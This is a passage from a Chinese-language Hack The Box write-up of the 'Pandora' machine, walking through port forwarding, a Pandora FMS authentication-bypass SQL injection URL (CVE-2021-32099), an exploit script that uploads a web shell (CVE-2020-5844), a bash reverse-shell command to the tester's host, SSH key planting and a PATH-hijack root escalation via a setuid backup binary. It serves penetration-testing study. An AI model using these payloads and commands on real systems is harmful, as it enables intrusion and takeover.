-rw-r--r--  1 matt matt  11772 Jan  3  2020 functions_container.php
-rw-r--r--  1 matt matt   1296 Jan  3  2020 functions_credential_store.php
-rw-r--r--  1 matt matt  24900 Jan  3  2020 functions_cron.php
-rw-r--r--  1 matt matt  30834 Jan  3  2020 functions_custom_fields.php
-rw-r--r--  1 matt matt   6141 Jan  3  2020 functions_custom_graphs.php
-rw-r--r--  1 matt matt  62274 Jan  3  2020 functions_db.php
-rw-r--r--  1 matt matt   2264 Jan  3  2020 functions_event_responses.php
-rw-r--r--  1 matt matt 203093 Jan  3  2020 functions_events.php
-rw-r--r--  1 matt matt 201815 Jan  3  2020 functions_events.php.orig
-rw-r--r--  1 matt matt   2409 Jan  3  2020 functions_exportserver.php
-rw-r--r--  1 matt matt  16339 Jan  3  2020 functions_extensions.php
-rw-r--r--  1 matt matt  34154 Jan  3  2020 functions_filemanager.php
-rw-r--r--  1 matt matt   7919 Jan  3  2020 functions_forecast.php
-rw-r--r--  1 matt matt  55389 Jan  3  2020 functions_gis.php
-rw-r--r--  1 matt matt 168692 Jan  3  2020 functions_graph.php
-rw-r--r--  1 matt matt  92604 Jan  3  2020 functions_groups.php
-rw-r--r--  1 matt matt   7988 Jan  3  2020 functions_groupview.php
-rw-r--r--  1 matt matt 116612 Jan  3  2020 functions_html.php
-rw-r--r--  1 matt matt  12608 Jan  3  2020 functions_incidents.php
-rw-r--r--  1 matt matt  12627 Jan  3  2020 functions_integriaims.php
-rw-r--r--  1 matt matt  15493 Jan  3  2020 functions_io.php
-rw-r--r--  1 matt matt  12782 Jan  3  2020 functions_maps.php
-rw-r--r--  1 matt matt  27255 Jan  3  2020 functions_menu.php
-rw-r--r--  1 matt matt  17310 Jan  3  2020 functions_messages.php
-rw-r--r--  1 matt matt   4058 Jan  3  2020 functions_migration.php
-rw-r--r--  1 matt matt  95770 Jan  3  2020 functions_modules.php
-rw-r--r--  1 matt matt  51687 Jan  3  2020 functions_netflow.php
-rw-r--r--  1 matt matt  16692 Jan  3  2020 functions_network_components.php
-rw-r--r--  1 matt matt  73983 Jan  3  2020 functions_networkmap.php
-rw-r--r--  1 matt matt   1229 Jan  3  2020 functions_networkmaps.php
-rw-r--r--  1 matt matt   8151 Jan  3  2020 functions_network.php
-rw-r--r--  1 matt matt   2230 Jan  3  2020 functions_network_profiles.php
-rw-r--r--  1 matt matt  27613 Jan  3  2020 functions_notifications.php
-rw-r--r--  1 matt matt   2361 Jan  3  2020 functions_os.php
-rw-r--r--  1 matt matt   1229 Jan  3  2020 functions_pandora_networkmap.php
-rw-r--r--  1 matt matt 154858 Jan  3  2020 functions.php
-rw-r--r--  1 matt matt  35615 Jan  3  2020 functions_planned_downtimes.php
-rw-r--r--  1 matt matt   2148 Jan  3  2020 functions_post_process.php
-rw-r--r--  1 matt matt   9110 Jan  3  2020 functions_profile.php
-rw-r--r--  1 matt matt 181908 Jan  3  2020 functions_reporting_html.php
-rw-r--r--  1 matt matt 418051 Jan  3  2020 functions_reporting.php
-rw-r--r--  1 matt matt   2381 Jan  3  2020 functions_reporting_xml.php
-rw-r--r--  1 matt matt  23179 Jan  3  2020 functions_reports.php
-rw-r--r--  1 matt matt  40701 Jan  3  2020 functions_servers.php
-rw-r--r--  1 matt matt  32871 Jan  3  2020 functions_snmp_browser.php
-rw-r--r--  1 matt matt  12954 Jan  3  2020 functions_snmp.php
-rw-r--r--  1 matt matt  18055 Jan  3  2020 functions_tactical.php
-rw-r--r--  1 matt matt  81748 Jan  3  2020 functions_tags.php
-rw-r--r--  1 matt matt   2040 Jan  3  2020 functions_themes.php
-rw-r--r--  1 matt matt  31058 Jan  3  2020 functions_treeview.php
-rw-r--r--  1 matt matt 182399 Jan  3  2020 functions_ui.php
-rw-r--r--  1 matt matt   3871 Jan  3  2020 functions_ui_renders.php
-rw-r--r--  1 matt matt  60177 Jan  3  2020 functions_update_manager.php
-rw-r--r--  1 matt matt  33529 Dec  2  2021 functions_users.php
-rw-r--r--  1 matt matt  65797 Jan  3  2020 functions_visual_map_editor.php
-rw-r--r--  1 matt matt 173714 Jan  3  2020 functions_visual_map.php
-rw-r--r--  1 matt matt   7910 Jan  3  2020 functions_wmi.php
-rw-r--r--  1 matt matt   2098 Jan  3  2020 get_file.php
-rw-r--r--  1 matt matt   9272 Jan  3  2020 gettext.php
drwxr-xr-x  4 matt matt   4096 Dec  7  2021 graphs
drwxr-xr-x  6 matt matt   4096 Dec  7  2021 help
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 ics-parser
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 Image
-rw-r--r--  1 matt matt   1322 Jan  3  2020 include_graph_dependencies.php
drwxr-xr-x  8 matt matt   4096 Dec  7  2021 javascript
drwxr-xr-x  3 matt matt   4096 Dec  7  2021 languages
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 lib
-rw-r--r--  1 matt matt   4842 Jan  3  2020 load_session.php
-rw-r--r--  1 matt matt   1177 Jan  3  2020 php_to_js_values.php
drwxr-xr-x  3 matt matt   4096 Dec  7  2021 rest-api
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 sounds
-rw-r--r--  1 matt matt   6152 May 17  2019 streams.php
drwxr-xr-x  4 matt matt   4096 Dec  7  2021 styles
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 templates
-rw-r--r--  1 matt matt    637 Jan  3  2020 test.js
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 visual-console-client
-rw-r--r--  1 matt matt   2640 Jan  3  2020 web2image.js
-rw-r--r--  1 matt matt   5523 Jan  3  2020 websocket_registrations.php
daniel@pandora:~$ ls -lah /etc/apache2/sites-available/
total 24K
drwxr-xr-x 2 root root 4.0K Dec  7  2021 .
drwxr-xr-x 8 root root 4.0K Dec  7  2021 ..
-rw-r--r-- 1 root root 1.4K Apr 13  2020 000-default.conf
-rw-r--r-- 1 root root 6.2K Apr 13  2020 default-ssl.conf
-rw-r--r-- 1 root root  315 Dec  3  2021 pandora.conf
daniel@pandora:~$ cat /etc/apache2/sites-available/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>
daniel@pandora:~$ curl http://localhost/
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
daniel@pandora:~$ find /var/www/pandora/ -writable
daniel@pandora:~$

15、然后并没有什么收获，唯一的是发现了配置文件里好像，本地还有一个80端口的服务，这里使用ss再确认下

daniel@pandora:~$ ss -ltn
State             Recv-Q            Send-Q                       Local Address:Port                        Peer Address:Port            Process            
LISTEN            0                 4096                         127.0.0.53%lo:53                               0.0.0.0:*                                  
LISTEN            0                 128                                0.0.0.0:22                               0.0.0.0:*                                  
LISTEN            0                 80                               127.0.0.1:3306                             0.0.0.0:*                                  
LISTEN            0                 511                                      *:80                                     *:*                                  
LISTEN            0                 128                                   [::]:22                                  [::]:*                                  
daniel@pandora:~$

16、那就使用ssh进行转发出来吧，看看这个网站

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -L 80:127.0.0.1:80 daniel@10.10.11.136            

daniel@10.10.11.136's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 27 Dec 03:26:41 UTC 2023

  System load:           0.0
  Usage of /:            63.1% of 4.87GB
  Memory usage:          9%
  Swap usage:            0%
  Processes:             226
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:af3

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Dec 27 03:13:18 2023 from 10.10.14.3
daniel@pandora:~$

17、然后本机看一下这个网站信息

18、通过检索，我们发现了以下的信息

1
2
3

Pandora FMS

v7.0NG.742_FIX_PERL2020

19、这里使用谷歌进行搜集相关的漏洞信息

20、发现了一些漏洞信息情况

exploit-CVE-2020-5844

index.php?sec=godmode/extensions&sec2=extensions/files_repo在 Pandora FMS v7.0 NG 中，经过身份验证的管理员可以上传恶意 PHP 脚本，并通过文件位置的 Base64 解码来执行它们。这会影响v7.0NG.742_FIX_PERL2020.

https://www.sonarsource.com/blog/pandora-fms-742-critical-code-vulnerabilities-explained/

在分析Pandora FMS 742控制台时，我们发现了以下代码漏洞：

SQL 注入（预身份验证）(CVE-2021-32099)
Phar 反序列化（预身份验证）(CVE-2021-32098)
远程文件包含（最低权限用户）(CVE-2021-32100)
跨站请求伪造 (CSRF)

https://sploitus.com/exploit?id=100B9151-5B50-532E-BF69-74864F32DB02

https://github.com/l3eol3eo/CVE-2021-32099_SQLi

POC:
http://localhost:80/pandora_console/include/chart_generator.php?session_id=PayloadHere%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a => Pandora FMS Graph ( - )

reload: http://localhost:8000/pandora_console/ to access webpage

21、这里我们采用了 CVE-2021-32099_SQLi 漏洞，直接登录到网站后台了

http://localhost:80/pandora_console/include/chart_generator.php?session_id=PayloadHere%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a

http://localhost:8000/pandora_console/

22、可以看到我们进入到了网站后台页面，但是还是需要继续漏洞利用，这里想开了一开始我们通过百度检索发现的 CVE-2020-5844 漏洞，而该漏洞需要一个漏洞利用脚本，我们在 searchsploit 中就有这个利用脚本

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Pandora FMS 7.0 NG 742
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)                                                     | php/webapps/50961.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

23、这里进行下载尝试

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/50961.py 
  Exploit: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
      URL: https://www.exploit-db.com/exploits/50961
     Path: /usr/share/exploitdb/exploits/php/webapps/50961.py
    Codes: CVE-2020-5844
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (1384)
Copied to: /home/kali/桌面/50961.py

24、尝试运行一下

┌──(kali㉿kali)-[~/桌面]
└─$ python3 50961.py                                                
UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution

Usage:
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
  python3 exploit-CVE-2020-5844.py -h

Options:
  -t    Target host and port. Provide target IP address and port.
  -u    Target username and password. Provide username and password to log in to Pandora FMS.
  -p    Target valid PHP session ID. No username or password needed. (Optional)
  -s    Reverse shell mode. Provide local IP address and port. (Optional)
  -c    Custom command mode. Provide command to execute. (Optional)
  -w    Web shell custom mode. Provide custom PHP file name. (Optional)
  -h    Show this help menu.

23、这里需要使用下获取下cookie信息

07ginjuage5gp37lqlualmfpah

24、然后我们开始执行命令，上传一个WEBshell吧

┌──(kali㉿kali)-[~/桌面]
└─$ python3 50961.py -t 127.0.0.1 80 -p 07ginjuage5gp37lqlualmfpah 
        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
PHPSESS: 07ginjuage5gp37lqlualmfpah
WEBFILE: unicord.php
WEBSITE: http://127.0.0.1:80/pandora_console
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:80/pandora_console/images/unicord.php?cmd=whoami

25、这里可以看出来已经成功获取到一个网站的webshell 了，接下来就是构造反弹shell代码，进行获取交互式shell

1 2	`访问地址： 127.0.0.1/pandora_console/images/unicord.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.3%2F10086%200%3E%261%22`

26、成功获取到监听，并读取到第一个flag信息

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.136] 34152
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$ 

matt@pandora:/var/www/pandora/pandora_console/images$ cat /home/matt/user.txt
cat /home/matt/user.txt
3b035facfdc16f5a6f5414e27d851381
matt@pandora:/var/www/pandora/pandora_console/images$

0x02 系统权限获取

27、为了方便我们进行后续操作，这里我们把本地的公钥放入到目标靶机的 matt 用户下进行使用

matt@pandora:/var/www/pandora/pandora_console/images$ cd ~
cd ~
matt@pandora:/home/matt$ ls
ls
user.txt
matt@pandora:/home/matt$ mkdir .ssh
mkdir .ssh
matt@pandora:/home/matt$ echo "ssh-rsa AAAAB3NKBQAEEmopirH5MZzROwVXA3 kali@kali" > /home/matt/.ssh/authorized_keys
<OwVXA3 kali@kali" > /home/matt/.ssh/authorized_keys
matt@pandora:/home/matt$

28、使用ssh进行登录

┌──(kali㉿kali)-[~/桌面]
└─$ ssh matt@10.10.11.136 -i ../.ssh/id_rsa 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 27 Dec 06:25:01 UTC 2023

  System load:           0.0
  Usage of /:            63.3% of 4.87GB
  Memory usage:          15%
  Swap usage:            0%
  Processes:             237
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:af3

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

matt@pandora:~$

29、查看本机拥有搞权限文件时，发现了一个备份文件

matt@pandora:/home/matt$ find / -perm -4000 -ls 2>/dev/null
find / -perm -4000 -ls 2>/dev/null
   264644    164 -rwsr-xr-x   1 root     root       166056 Jan 19  2021 /usr/bin/sudo
   265010     32 -rwsr-xr-x   1 root     root        31032 May 26  2021 /usr/bin/pkexec
   267386     84 -rwsr-xr-x   1 root     root        85064 Jul 14  2021 /usr/bin/chfn
   262764     44 -rwsr-xr-x   1 root     root        44784 Jul 14  2021 /usr/bin/newgrp
   267389     88 -rwsr-xr-x   1 root     root        88464 Jul 14  2021 /usr/bin/gpasswd
   264713     40 -rwsr-xr-x   1 root     root        39144 Jul 21  2020 /usr/bin/umount
   262929     20 -rwsr-x---   1 root     matt        16816 Dec  3  2021 /usr/bin/pandora_backup
   267390     68 -rwsr-xr-x   1 root     root        68208 Jul 14  2021 /usr/bin/passwd
   264371     56 -rwsr-xr-x   1 root     root        55528 Jul 21  2020 /usr/bin/mount
   264643     68 -rwsr-xr-x   1 root     root        67816 Jul 21  2020 /usr/bin/su
   264040     56 -rwsr-sr-x   1 daemon   daemon      55560 Nov 12  2018 /usr/bin/at
   264219     40 -rwsr-xr-x   1 root     root        39144 Mar  7  2020 /usr/bin/fusermount
   267387     52 -rwsr-xr-x   1 root     root        53040 Jul 14  2021 /usr/bin/chsh
   262815    464 -rwsr-xr-x   1 root     root       473576 Jul 23  2021 /usr/lib/openssh/ssh-keysign
   264920     52 -rwsr-xr--   1 root     messagebus    51344 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   264927     16 -rwsr-xr-x   1 root     root          14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
   266611     24 -rwsr-xr-x   1 root     root          22840 May 26  2021 /usr/lib/policykit-1/polkit-agent-helper-1

30、本机运行下这个文件

matt@pandora:~$ 
matt@pandora:~$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: Removing leading `/' from member names
/var/www/pandora/pandora_console/AUTHORS
tar: Removing leading `/' from hard link targets
/var/www/pandora/pandora_console/COPYING
/var/www/pandora/pandora_console/DB_Dockerfile
/var/www/pandora/pandora_console/DEBIAN/
/var/www/pandora/pandora_console/DEBIAN/md5sums
/var/www/pandora/pandora_console/DEBIAN/conffiles
/var/www/pandora/pandora_console/DEBIAN/control
/var/www/pandora/pandora_console/DEBIAN/make_deb_package.sh
/var/www/pandora/pandora_console/DEBIAN/postinst
/var/www/pandora/pandora_console/Dockerfile
/var/www/pandora/pandora_console/ajax.php
/var/www/pandora/pandora_console/attachment/
/var/www/pandora/pandora_console/attachment/.htaccess
/var/www/pandora/pandora_console/attachment/downloads/
/var/www/pandora/pandora_console/attachment/downloads/.gitignore
/var/www/pandora/pandora_console/attachment/plugin/
/var/www/pandora/pandora_console/attachment/plugin/index.html
/var/www/pandora/pandora_console/attachment/files_repo/
/var/www/pandora/pandora_console/attachment/pandora_chat.global_counter.txt
/var/www/pandora/pandora_console/attachment/.cron.supervisor.servers.idx
/var/www/pandora/pandora_console/attachment/mibs/
/var/www/pandora/pandora_console/attachment/mibs/index.html
/var/www/pandora/pandora_console/attachment/index.html
................
/var/www/pandora/pandora_console/vendor/egulias/email-validator/composer.json
/var/www/pandora/pandora_console/vendor/egulias/email-validator/phpunit.xml.dist
/var/www/pandora/pandora_console/vendor/egulias/email-validator/LICENSE
/var/www/pandora/pandora_console/ws.php
Backup successful!
Terminating program!
matt@pandora:~$

31、它正在做备份，有一长串路径，全部在/var/www/pandora. 在顶部它引用了tar几次，这表明它用于tar压缩/存档。

32、我们把这个文件下载下来，本地用strings工具再查看下

matt@pandora:~$ file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:~$ 
matt@pandora:~$ file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:~$ python3 -m http.server -d /usr/bin/ 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...
10.10.14.3 - - [27/Dec/2023 06:30:36] "GET /pandora_backup HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
matt@pandora:~$ 

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://10.10.11.136:9001/pandora_backup                                                            
--2023-12-27 14:30:36--  http://10.10.11.136:9001/pandora_backup
正在连接 10.10.11.136:9001... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：16816 (16K) [application/octet-stream]
正在保存至: “pandora_backup”

pandora_backup                         100%[===========================================================================>]  16.42K  53.7KB/s  用时 0.3s    

2023-12-27 14:30:37 (53.7 KB/s) - 已保存 “pandora_backup” [16816/16816])

┌──(kali㉿kali)-[~/桌面]
└─$ ls
50961.py  pandora_backup  reports

┌──(kali㉿kali)-[~/桌面]
└─$ strings pandora_backup     
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
backup.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
getuid@GLIBC_2.2.5
system@GLIBC_2.2.5
geteuid@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
setreuid@GLIBC_2.2.5
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
       
┌──(kali㉿kali)-[~/桌面]
└─$

33、这里可以看出来该tar命令没有使用绝对路径，这意味着我们可以利用PATH环境变量注入漏洞将权限提升到root！

由于没有给定路径tar，因此它将使用当前用户的PATH环境变量来查找要运行的有效可执行文件。但我可以控制该路径，这使得它很容易受到路径劫持。

将我们的PATH环境变量导出到/tmp：

echo $PATH

export PATH=/tmp/test:$PATH

echo $PATH

34、我们开始尝试设置环境变量

matt@pandora:~$ ls -la /tmp
total 52
drwxrwxrwt 13 root root 4096 Dec 27 06:09 .
drwxr-xr-x 18 root root 4096 Dec  7  2021 ..
drwxrwxrwt  2 root root 4096 Dec 27 01:06 .font-unix
drwxrwxrwt  2 root root 4096 Dec 27 01:06 .ICE-unix
drwx------  3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-apache2.service-xIYOKi
drwx------  3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-logind.service-jawnUh
drwx------  3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-resolved.service-Rdzmth
drwx------  3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-timesyncd.service-prnntj
drwx------  3 root root 4096 Dec 27 01:30 systemd-private-062d5d900bcf45168ea97553a0cb3f56-upower.service-aJrvDh
drwxrwxrwt  2 root root 4096 Dec 27 01:06 .Test-unix
drwx------  2 root root 4096 Dec 27 01:06 vmware-root_711-4256610694
drwxrwxrwt  2 root root 4096 Dec 27 01:06 .X11-unix
drwxrwxrwt  2 root root 4096 Dec 27 01:06 .XIM-unix
matt@pandora:~$ cd tmp
-bash: cd: tmp: No such file or directory
matt@pandora:~$ cd /tmp
matt@pandora:/tmp$ ls
systemd-private-062d5d900bcf45168ea97553a0cb3f56-apache2.service-xIYOKi
systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-logind.service-jawnUh
systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-resolved.service-Rdzmth
systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-timesyncd.service-prnntj
systemd-private-062d5d900bcf45168ea97553a0cb3f56-upower.service-aJrvDh
vmware-root_711-4256610694
matt@pandora:/tmp$ mkdir test
matt@pandora:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/tmp$ cd test/
matt@pandora:/tmp/test$ export PATH=/tmp/test:$PATH
matt@pandora:/tmp/test$ echo $PATH
/tmp/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/tmp/test$ touch tar
matt@pandora:/tmp/test$ vim tar
matt@pandora:/tmp/test$ cat tar
#!/bin/bash

bash
matt@pandora:/tmp/test$ chmod +x tar

35、然后我们开始运行程序，并获取到最终的flag信息

matt@pandora:/tmp/test$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp/test# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp/test# cat /root/root.txt
42d658b2326590f95f19fbceb1aab99f
root@pandora:/tmp/test#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/423

打靶记

#shooting-range

Pandora-htb-writeup

https://sh1yan.top/2023/12/27/Pandora-htb-writeup/

作者

shiyan

发布于

2023年12月27日

许可协议

Paper-htb-writeup 上一篇

Horizontall-htb-writeup 下一篇